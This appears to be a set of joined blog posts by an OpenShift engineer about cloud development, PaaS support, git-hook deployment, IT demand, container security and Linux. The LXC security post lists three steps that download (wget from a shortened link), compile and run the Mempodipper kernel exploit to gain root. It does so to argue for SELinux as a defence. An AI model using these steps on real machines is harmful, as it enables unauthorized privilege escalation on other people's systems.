I’ve seen a lot of interesting evolutionary changes in our development practices over the last 10 years or so and I actually don’t think there have been many revolutionary changes. Until now, that is. The power of cloud technologies has introduced a new twist in what development teams can utilize – infinite resources. Yeah, yeah, I know there really is a capacity limit and I know someone still pays the bill at the end of the day but it’s still fundamentally different than what we are used to. Without even realizing it, we have built development processes around resource constraints – everything from how developers code, to our QE, to our release processes. But that doesn’t have to be the case anymore and it doesn’t have to break the bank either. On OpenShift, we decided early on to build our development process entirely around the concept of using as many volatile resources as we needed to see how productive we could be. I’ll let you judge for yourself, but to me, the results have been astounding. Not only is our team more productive than any development team I’ve worked with before, but we are shockingly more cost effective as well.
Let’s take a trip down memory lane first to give you some context to my past experience. If you roll back the clock 5 years or so, scaling development was painful. Development essentially ran off desktops and the operations controlled environments were rigid and static. On the development side, I was constantly struggling to get powerful enough desktops and enough of them to keep the development team productive. Virtualization wasn’t that prominent yet, so often the developers needed two or three desktops to emulate multi-tier systems. I spent as much time in purchasing and unpacking boxes as I did coding (and on the warranty calls when the things broke down). We would constantly have power issues and stability issues as developers would inevitably start hosting shared services on their desktops like our test or continuous integration servers. Power outages every few days would destabilize services and every once in a while kill a hard drive that wasn’t backed up. On the other hand, our operations controlled environments that had stable power and redundant storage were ridiculously expensive and effectively static. Those environments were essentially mirrors of production and expected to be as stable as production. Developers needed agility so they stuck to their desktops. It’s the classic development and operations divide and I’ve seen this same scenario play out time and time again.
When we started OpenShift, we wanted to approach it differently. Sure, everyone still gets a laptop (or in some cases a desktop) for a personalized development environment but that is where physical resources stop. Developers have the ability to spin up as many mini-environments and sync their local code to those environments. They can use those mini-environments to kick off various suites of tests as well as do ad-hoc testing of their own. They might only need a single environment if they are working on a single feature or they might need a dozen. The focus for us was on ease of consumption – a single command and a 30 second wait is all they need to spin up a new environment of the latest stable build. Another command synchronizes their local changes to that environment. The most important thing is that there are no limits to the number of environments they can wield – whatever makes them productive.
But let’s talk cost effectiveness. How can we provide something like this and not completely break the bank? Well, this is where IaaS pricing can start benefiting the consumer. Before you get there however, you have some challenges to solve. The first challenge is the developer habit of keeping long running machines around. Any time a developer wanted to test something, we wanted him to be able to spin up a new machine with his changes. You have to make it easier to start with a new machine instead of keeping an old one around. Our goal was to keep that entire operation to under a minute, providing easy access to various levels of the codebase and that did the trick for us. Once you’ve broken the requirement of long running machines, you now start to take advantage of hourly pricing with most IaaS vendors. If a developer can spin up a machine, run their tests and finish in an hour, you probably paid about $0.30 for that operation. If they need 6 hours, you are paying less then $2. To help reinforce this model, any machine that hasn’t been logged into in 6 hours in our environment automatically gets stopped. The reality is that developers aren’t great at cleaning up, but once you get the model right, they don’t need resources for a long time. If you get the habit formed around starting each time with a new VM, everything else starts to fall in place.
And yes, being Red Hat, we’ve also open sourced this work (https://github.com/openshift/origin-dev-tools) too. While these tools are fairly specialized for OpenShift development, hopefully you might find a nugget or two in them that will help in your own process. And we’re always up for suggestions so if you see a better way of doing something, please send us a pull request!
Next up, I’ll discuss how we expanded upon this to improve our code submission and review process. As many readers will know, cutting and testing code is only one part of developer effectiveness. We’ve been able to use these same techniques to fundamentally change how we look at code. Ever wonder what that OpenShift GitHub Bot is all about commenting on pull requests (e.g. https://github.com/openshift/origin-server/pull/1238)? If so then stay tuned!
I’ve noticed a growing tend over the last year with companies that are providing exciting new enterprise software, the promise of support and no chance of being able to deliver on it. And unfortunately, for consumers trying to sort through all the new offerings out there, it can sometimes be difficult to separate all the marketing glitz and glamour from the reality. With OpenShift, Red Hat is able to stand behind the software that it distributes – they have deep expertise in every layer of the stack. Given that, it frustrates me when I see others claim the same model without the expertise – that approach is just taking advantage of customers who don’t do their homework before buying.
Let’s think about what would happen if more industries took this same approach – the medical profession for example. Imagine what the conversation might be after your yearly check-up.
Doctor: Well, I’ve got some good news and some bad news. The good news is that you still look okay. The bad news is that the is something going on under the surface that you are going to want to figure out.
You: Okay… what exactly do you mean by ‘under the surface’? Also, when you say that ‘I’ will need to figure this out, what do you mean?
Doctor: I mean something is going on underneath your skin. What happens under there is basically a mystery to us – it’s not something we support. That said, whatever is going on probably needs to be fixed so you’ll want to find someone that can do that. We could try but we really don’t have any better odds than you in fixing the problem…
If a conversation like this is so unacceptable in other disciplines, why do we so readily accept it in software? Let’s take Platform as a Service (PaaS) for example. PaaS is platform positioned to be the core application foundation in your company. It is tightly integrated with both the operating system (OS) and your application platforms. Those that say otherwise are either dreaming or trying to deceive you. That tight integration is what lets the PaaS platform do things so that you don’t have to. But many of the PaaS vendors in the market have limited experience across the OS and the application stacks. In almost all cases, the PaaS providers are going to have to rely on a separate company for the operating system distribution. In many cases, they are going to have to do the same for the application stacks.
What are these companies going to do when their customers hit issues in area outside of the core PaaS software? Most of these guys aren’t active in the open source versions of the software so I doubt they are going to do the fixes themselves. Don’t let them give you the ‘power of open source software’ unless they are involved enough to influence those changes. Maybe they will proceed with the same awkward conversation as the above example…
Now, maybe these providers have the ability to support all the things they promise. Maybe they have all the connections in the open source projects to maintain stable distributions themselves. This is what Red Hat does but I don’t see too many others doing the same. At a minimum, you should check because you might end up buying a product from a company whose business models is based on you not making that call for help…
To some, cloud is an excuse to introduce “black box” processes that lock users into their services. But they can’t really come right out and say that. Instead they distract from their approach with fanciful names and tell us that the cloud is full of magic and wonder that we don’t need to understand. This type of innovation is exciting to some, but to me, combining innovation with a lock-in approach is depressing. In the past, we’ve seen it at the operating system level and the hypervisor level. We’ve also seen open source disrupt lock-in at both levels and we are going to see the same thing happen in the cloud.
When we started designing and building OpenShift, we wanted to provide more than just a good experience to end users that, in turn, locked them in to our service. One of the early design decisions we made on OpenShift was to utilize standards as much as we could and to make interactions transparent at all levels. We did want the user experience to be magical but also completely accessible to those wanted to dig in. To demonstrate this, let’s walk through the deployment process in OpenShift – arguably the most magical part of the entire offering…
As we were designing a PaaS service, focused on developers, our first goal was to make the deployment process as natural as possible for developers. For most developers, their day to day process goes something like code, code, code, commit. For those questioning this process already let me speak on behalf of the developer in question by saying
Tests?! Of course I’ve already written the tests! They were in the third ‘code’!
Anyway, we wanted to plug into that process and to do that we chose git. The reason for selecting git over more centralized source code management tools like subversion was that the distributed nature of git allowed the user to have full control over their data. The user always had access to their entire historical repository and as developers, we thought that was a critical requirement. Given that, we standardized on git as the main link between our users’ code and OpenShift.
Now let’s look at what that development process might look like in practice. First, you start off with the code, code, commit part:
vi <file of your choice> # make earth shattering changes git commit -a -m "My earth shattering comment"
The next part of the process for those familiar with git is the publish process. You run a ‘push’ command to move your code from your local repository to your distributed clones. So when you run:
Your code is transferred to OpenShift and automatically deployed to your environment. Regardless of whether code needs to be compiled, tests need to be run, dependencies need to be downloaded, a specific packaging spec needs to be built – it all happens on the server side with this one command. To do this we utilize a git hook to kick off the deployment process. Wait – I know what you are thinking…
What?! Just a git hook?! This is the cloud baby! Shouldn’t this be custom compiling my code into a Zeus Hammer to perform a magical Cloud Nuclear transfer?!!
If you ask us, a git hook works just fine because it’s what you would probably do yourself. We simply map the post-receive git hook to a post_receive_app.sh script. That script invokes a series of scripts (called hooks) representing various steps in the deployment process. Some of the hooks are provided by the cartridge that your application is using and some of the scripts are provided by the application itself. This approach let’s the cartridge provide base functionality that can be further customized by the application.
First let’s talk about the cartridge hooks. Having cartridge specific hooks is important because each cartridge needs to do different things in their deployment process. For example, when a Java cartridge detects a deployment, we want to do a Maven build, but when a Ruby cartridge detects a deployment, it should execute Bundler. The cool part is that each individual cartridge can override anything it needs to in the default process.
Let’s look at how the Ruby cartridge implements this. We can look at the ruby-1.9 cartridge’s overridden build.sh script to see how it calls bundler. When you use the Java cartridge, it leverages Maven in the build process using the same technique. You can implement the pieces that are right for your cartridge where it makes sense and still utilize the generic process everywhere else. In isolation, each individual script is really quite simple. In aggregate though, all those extensions can become extremely powerful and do much of the heavy lifting on behalf of the users.
But, what if you want to change the default behavior for a specific application? No problem! You have a collection of action hooks that are provided with each application instance in their repository. You could put your own code in pre_build, build, deploy, post_deploy or wherever else it makes sense.These are found in your application in ~/.openshift/action_hooks. They are invoked just like the cartridge hooks as part of the deployment process. For example, you can see how the pre_build.sh script is called before we run the build. What you choose to do with these hooks is your decision. Put some code in them and they will get called at each step in the deployment process. This let’s you not only leverage the power of a customized cartridge, but also let’s you tweak and tune so things are just right for your application.
At the end of the day, harnessing the power of the cloud doesn’t need to lock you into a vendor. At OpenShift, we believe that transparency, standards and extensibility will make a process that lasts the test of time. I hope this has provided some visibility to how the OpenShift deployment model works and also has given you some insight into navigating the codebase. And if this has peaked your interested and you find yourself digging through more and more code, please reach out and get involved.
Today I read a great article that compared the adoption of cloud in IT to the adoption of open source. In a nutshell, cloud is being resisted by IT groups much like open source used to be resisted. Given my role on OpenShift and having been at Red Hat for several years, I’ve seen both forms of this resistance in the field. In this post, I’ll try and debunk one of the most common IT dismissals of utilizing cloud:
I don’t have dynamic demand – cloud won’t help me
That is a tricky defense tactic because many people in IT believe it to be true. To dispel this myth, I find it best to break demand into external and internal demand.
It is fairly easy to tell whether your company has dynamic external demand. That usually boils down to whether or not you have seasonal demand (e.g. retail sites and Black Friday) or event driven demand (e.g. Superbowl ad). Companies with seasonal or spiky production demand have an obvious use case for the elasticity of cloud but that is only half the story.
However, while relatively few companies have dynamic external demand, the vast majority of IT shops have an unknown dynamic demand internally: their own consumers and development teams. But when first asked, they often believe this not to be the case. The conversation usually goes this way:
Question: Are you giving your users all the resources they think they need?
Answer: No. They always ask for more than they need and we don’t have the capacity. The initial requests just aren’t reasonable.
Question: Is the process for getting resources easy or self-service or does it require a ton of justification and cost?
Answer: We have to make the process tough. If we gave users what they asked for, we’d go broke!
Question: Do your users ever give back unused resources or do they try and hold on to them forever?
Answer: That’s just it – they never give anything back! They would keep it forever if we didn’t watch them like hawks and claw it all back…
At that point, this is the question that often makes them re-think their initial assumption about not having dynamic demand internally:
Question: If you gave users everything they wanted and were able to recoup those resources when they weren’t used, would you have dynamic demand?
Answer: (long pause) Yeah…. I guess we would. (long pause) Haven’t thought about it that way before…
I’ve had this same conversation play out time and time again. Most of the guys on the IT side aren’t knowingly being malicious, but they have built a protective system over the course of years and have lost sight of what their users actually need. They think that they are protecting users from themselves whereas in reality, they are eliminating themselves as a credible service provider. Under-served users will just go directly to the public cloud providers and work around IT entirely. This has been happening with SaaS offerings such as Salesforce.com for years and the behavior will be no different with public cloud providers.
IT organizations that embrace these changes will more likely end up being a strategic partner with their users. By leveraging cloud technologies instead of rejecting them, they can revolutionize the way they provide compute resources to their users and combine that with the valuable corporate data they already have. Having worked in IT, I think this is underlying desire of many IT shops. Unfortunately, the processes they have built for themselves are often working against that desire without them even knowing. Those that will survive will need to change and change fast to maintain relevance.
First off, let me state that I think the LXC project is great. In previous blog posts, I’ve talked about segmenting existing virtual machines to securely run multiple workloads and achieve better flexibility, cost, etc. This concept is often referred to as ‘Linux Containers’ and creating these containers with the LXC project is a very popular approach. LXC aggregates a collection of other technologies such as Linux Control Groups, Kernel Namespaces, Bind Mounts and others to accomplish this in an easy way. Good stuff. The question however, is whether LXC alone is enough to give you confidence in your approach to utilizing Linux containers.
In the words of Dan Berrange:
Repeat after me “LXC is not yet secure. [. . .]”
In other words, no it’s not enough. The main problem right now is that LXC doesn’t have any inherent protection against exploits that allow a user to become root. In the world of Linux, traditionally if you have root you can do anything. When using containers, that means that if one container can find a way to become root on the machine, it can do whatever it wants with all the other containers on the box. I think the official term for that situation in IT is a ‘cluster’. While the concept of capabilities is being introduced into the kernel to help segment the abilities that root actually has, that is a long ways out from being a realistic defense, especially on the production systems in deployment today.
How realistic are these exploits, though? To many, the concept of a kernel or security exploit is something they would rather believe just doesn’t actually happen. Maybe they prefer to think that it’s limited to the realm of academic discussions. Or maybe they just believe it’s not going to happen to them.
Unfortunately, the reality is quite different. While I agree that finding an exploit requires an amazing amount knowledge and creativity, using an exploit for malicious purposes isn’t that challenging. For example, let’s look at the excellent article written by Jason A. Donenfeld about a kernel exploit that is able to achieve root access. Jason explains how this exploit works in amazing detail here – http://blog.zx2c4.com/749. Believe me, discovering that and writing that article was a LOT of work. But now, let’s look at how easy it is to use that exploit on unpatched kernels:
- Download the provided C program (e.g. wget http://bit.ly/wELTpn)
- Compile it (gcc mempodipper.c -o mempodipper)
- Run it and get root access (./mempodipper)
Pretty scary huh? Three steps and I could get root on your machine. I can hear the sighs of relief already though, as people start thinking:
I don’t have to worry about this since I don’t let people run arbitrary code run on my machines…
Let’s discuss that train of thought for a minute. First, let’s approach this from the perspective of a Platform as a Service (PaaS). A PaaS essentially allows users to run their own code on machines shared by many. That means experimenting with an exploit like this in a PaaS environment isn’t very difficult at all. And remember, if any user can get root on that system, they own all the applications on it.
Not consuming or hosting a PaaS? Well, I’ve spent many years in IT shops and the traditional IT deployments for large companies don’t look all too different. Granted, the code is usually coming from employees and contractors, but you still probably don’t want to risk root exposures by anyone that is able to deploy a change into your environment.
Well if LXC doesn’t protect against this and my traditional environments are susceptible as well, is there any hope at all?!?! Thankfully, there is.
The solution is using SELinux in combination with whatever container technologies you are using. With an SELinux policy, you are essentially able to control the operations of any running process, regardless of what user they happen to be. SELinux provides a layer of protection against the root layer where most other security mechanisms fail. When a user is running in a SELinux context on a system and tries an exploit like the one above, you have an extra line of defense. It’s easy for you to establish a confined environment that limits riskier operations like syscalls to setuid and restricts memory access which, in turn, would stop this exploit and others. Most importantly, you can get consistent protection across any process, no matter what user they are running as.
You can think of SELinux as a whitelisting approach instead of blacklisting. The traditional model of security (often referred to as Discretionary Access Control or DAC) requires protecting against anything a user should not be able to do. Given the complexity of systems today, that’s becoming unrealistic for mere mortals. The SELinux model of security (often referred to as Mandatory Access Control or MAC) requires enabling everything a user should be able to do.
While it’s not a silver bullet, it’s an elegant mitigation in many areas. Many types of IT hosting are becoming increasingly standardized and you can put in place fairly simple policies that specify what users should be able to do. For web applications, you are going to allow binding to HTTP / HTTPS ports. You are going to probably allow JDBC connections. You can describe the allowed behaviors of many of your applications in a fairly concise way. Thinking of security this way mitigates many of the exploits that take a creative path like the one above (setuid access, /proc file descriptor access, and memory manipulation). Unless you have a pretty special web application, it’s safe to say it shouldn’t be doing that stuff 🙂
Interested in learning more? The place I recommend to start is with the Fedora documentation. Fedora and RHEL have some of the best SELinux policies and support in the industry. The documentation covers everything from learning SELinux to debugging it. Most importantly though, don’t get fooled into thinking all Linux distributions are the same. While SELinux support is in the kernel, what really matters is the ecosystem of policies that exist. In Fedora or RHEL, you get whitelists ready-made for a slew of well known systems like Apache. In many other distros, you’d spend your time having to recreate that work for the standard systems and never have any time to focus on your application policies. Probably not your best use of time and would be a daunting first experience with SELinux to say the least.
My last disclaimer is that even as powerful as SELinux is, I wouldn’t recommend on putting all your eggs in one basket when it comes to security. Combine SELinux with other security measures and maintain traditional operational best practices to minimize your exposure (e.g. apply security updates, audit, etc). In other words, use it as an enhancement to what you do today, not a replacement.
Well, if you’ve made it this far, I’ll assume you are a convert: Welcome to the world of SELinux and sleeping a little better at night!
Those that know me probably know where this is going. However, for those of you that do not know me, I’ll state my stance up front:
I do not understand that logic behind the argument that the operating system will become less relevant in the cloud. That is a fallacy.
I realize that this is a popular messaging approach for some vendors that have a minimal stake or understanding of the operating system. However, please don’t get pulled into that marketing machine. Let’s try and look at this from a more practical standpoint. I often hear this reasoning brought up in the following context:
- You don’t care what operating system you are running in the cloud. You only have to care about your application.
I spend my days building a Platform as a Service (PaaS) offering (aka OpenShift) so I’m particularly sensitive to this argument. While I agree that our goal on OpenShift is to make the developer experience as simple as possible, everything beyond the initial registration experience today is going to take you to interacting with the operating system at some level. Beyond your personal machine setup, technologies like SSH are heavily used in PaaS offerings. In addition to being the backbone of the mundane functions like supporting authentication and providing the underlying protocol for git transfers, it’s also often used directly by developers to support use cases like debugging. When your applications are running on remote machines, being able to port forward, attach local debuggers and poke and prod from your laptop is critical. Technologies in Linux like SSH make that possible.
Okay, so maybe SSH is important, but what other aspects of the operating system should you have to care about? I guess that is where the disconnect is to me. A PaaS, or any cloud service, should support and allow you to leverage common tools and standards to the greatest extent possible. Why? Because a lot of people already know them and it makes those users more productive. Why on earth would your users want to go re-implement everything to your standard? If you love rsync and want to use rsync over SSH, it should just work. If you want to schedule something on your PaaS application, you should be able to use cron. If you want to shell out and script something from your PaaS instance, you should be able to run a Bash / Perl script and have all the standard tools just work.
Now, don’t get me wrong, I don’t think you should be forced to use this stuff but it should be there as an option. Why? Because the tools that have worked in Linux for decades still work extremely well. Maybe better tools will be written in Ruby or Python for your use case and I would encourage you to use them if that is the case. Experimentation is critical, but it’s usually most productive if you are building on a stable base. In the cloud, just like in the data center, that base is Linux.
So far, I’ve really only focused on the end user experience and hopefully it’s apparent that even causal cloud users are still going to interact with the operating system regularly. Now if the end users of cloud services are still going to be exposed to the operating system, imagine the people that are building those services! At the end of the day, your competitive edge will be knowing the operating system so that you don’t waste time rebuilding things that already exist. On OpenShift for example, we use bleeding edge operating system functionality such as Linux control groups and filesystem polyinstantiation to help provide workload management and segment users. We could have built something to do that, but if there is already a robust solution already in the operating system, why build something new? We use SELinux for security because trying to build a rock solid security layer outside of the kernel is practically impossible. We use quota for managing filesystem allocations, we use tc for traffic control, PAM for authentication support and the list goes on and on. Using the functionality that exists in Linux allows us to focus on our goal of making the developer experience in the cloud easier. We get to focus on challenges that the operating system does not solve like automatically scaling your applications. Our understanding of Linux allows us to not waste time reinventing the wheel.
I’m not completely unreasonable. I do agree that the cloud will affect how you use Linux to some extent. The hardware layer is being abstracted to a large degree. That means will probably spend more time using networking technologies like SSH than you will messing with SAN configurations. The toolset you use from day to day will shift slightly, but it will be a slight shift, not a replacement. But at the end of the day, the operating system will still be a critical tool in your toolbox. And in the cloud, that operating system is Linux.